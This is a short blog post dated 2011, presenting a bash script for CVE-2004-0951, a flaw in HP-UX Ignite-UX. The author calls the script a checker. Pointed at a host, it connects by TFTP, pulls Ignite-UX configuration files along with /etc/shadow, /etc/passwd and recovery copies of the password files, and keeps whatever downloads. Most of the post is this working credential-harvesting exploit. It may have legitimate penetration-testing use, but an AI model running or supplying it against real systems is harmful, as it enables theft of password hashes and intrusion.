Projects: CVE-2004-0951: HP-UX Ignite-UX TFTP File Access Checker

There is an old problem detailed in CVE-2004-0951 where the make_recovery command in HP-UX mistakenly copies a bunch of files over to the TFTP directory. This could give an attacker some more info. I wrote this quick script to test/query a vuln server.

root@bt: ~ # cat hp_inite_tftp_checker.sh
#!/bin/bash
# HP-UX Ignite-UX TFTP File Access Checker
# by brad a.

echo "HP-UX Ignite-UX TFTP File Access Checker"
echo "by brad a."
echo "-------------------------------------------"

if [ $# != 1 ]; then
        echo "Usage:"
        echo -e "\t $@ <host>"
else

        if [ -d $1-ignite ]; then
                echo "[!] ERROR: $1-ignite already exists!"
        else
                mkdir $1-ignite/
                cd $1-ignite
                cat >> /tmp/hp_tftp_checker.tmp << EOF
connect $1
get /var/opt/ignite/config.local
get /var/opt/ignite/local/config
get /var/opt/ignite/local/host.info
get /var/opt/ignite/local/hw.info
get /var/opt/ignite/local/install.log
get /var/opt/ignite/local/manifest/manifest
get /var/opt/ignite/recovery/makrec.append
get /var/opt/ignite/recovery/ignite.defs
get /var/opt/ignite/server/preferences
get /var/opt/ignite/recovery/passwd.makrec
get /etc/shadow
get /etc/passwd
get /var/opt/ignite/recovery/passwd
get /var/opt/ignite/recovery/shadow
EOF

                tftp < /tmp/hp_tftp_checker.tmp 2&> /dev/null
                rm /tmp/hp_tftp_checker.tmp

                for i in *; do
                        if [ -s $i ] ; then
                                echo Found file: $i;
                        else
                                rm $i
                        fi
                done

                cd ..
                echo "Downloaded files are in $1-ignite"
        fi
fi

Projects

Friday, July 8, 2011

CVE-2004-0951: HP-UX Ignite-UX TFTP File Access Checker

1 comment: